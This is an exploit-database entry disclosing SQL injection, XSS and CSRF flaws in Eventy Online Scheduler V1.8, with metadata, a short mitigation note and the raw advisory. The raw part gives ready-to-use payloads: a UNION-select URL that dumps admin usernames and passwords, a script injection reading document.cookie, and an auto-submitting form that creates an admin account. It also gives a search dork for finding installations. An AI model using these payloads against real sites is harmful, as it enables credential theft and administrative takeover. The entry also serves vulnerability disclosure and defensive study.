Eventy Online Scheduler V1.8 - Multiple Vulnerabilties

vendor:

Eventy Online Scheduler

by:

AtT4CKxT3rR0r1ST

8,8

CVSS

HIGH

SQL Injection, Cross Site Scripting, Cross Site Request Forgery

89, 79, 352

CWE

Product Name: Eventy Online Scheduler

Affected Version From: V1.8

Affected Version To: V1.8

Patch Exists: NO

Related CWE: N/A

CPE: a:calendarscripts.info:eventy_online_scheduler

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2014

Eventy Online Scheduler V1.8 – Multiple Vulnerabilties

The SQL Injection vulnerability exists in the /eve_event.php file, where user-supplied input is not properly sanitized before being used in an SQL query. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL statements to the vulnerable script. The Cross Site Scripting vulnerability exists due to insufficient sanitization of user-supplied input in the 'selmonth' and 'selyear' parameters of the 'eventy.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious JavaScript code to the vulnerable script. The Cross Site Request Forgery vulnerability exists due to the lack of proper validation of user-supplied input in the 'a_admins.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious HTML code to the vulnerable script.

Mitigation:

Input validation should be performed on all user-supplied input to prevent malicious code from being executed. The application should also use a secure random token to prevent CSRF attacks.

Source

Exploit-DB raw data:

Eventy Online Scheduler V1.8   - Multiple Vulnerabilties
===================================================================

####################################################################
.:. Author         : AtT4CKxT3rR0r1ST
.:. Contact        : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com]
.:. Home           : http://www.iphobos.com/blog/
.:. Script         :
http://calendarscripts.info/event-calendar-software.html
.:. Dork           : "Powered by CalendarScripts.info"
####################################################################

[1] Sql Injection
==================
VULNERABILITY
##############
/eve_event.php (line 15-16)

$query="SELECT * FROM $T_EVENTS WHERE id=".$_GET['id'];

$event=$DB->sq($query);

#########
EXPLOIT
#########
http://site/eve_event.php?id=null+and+1=2+union+select+1,group_concat(id,0x3a,username,0x3a,pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+evp_admin


[2] Cross Site Scripting
=========================


http://site/eventy.php?next=1&selmonth=January&selyear=2014'"()%26%25<ScRiPt
>prompt(document.cookie)</ScRiPt>


[3] Cross Site Request Forgery
==============================

[Add Admin]

<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="http://site/a_admins.php">
<input type="hidden" name="username" value="admin"/>
<input type="hidden" name="pass" value="admin"/>
<input type="hidden" name="add" value="1"/>
</form>
</body>
</html>


####################################################################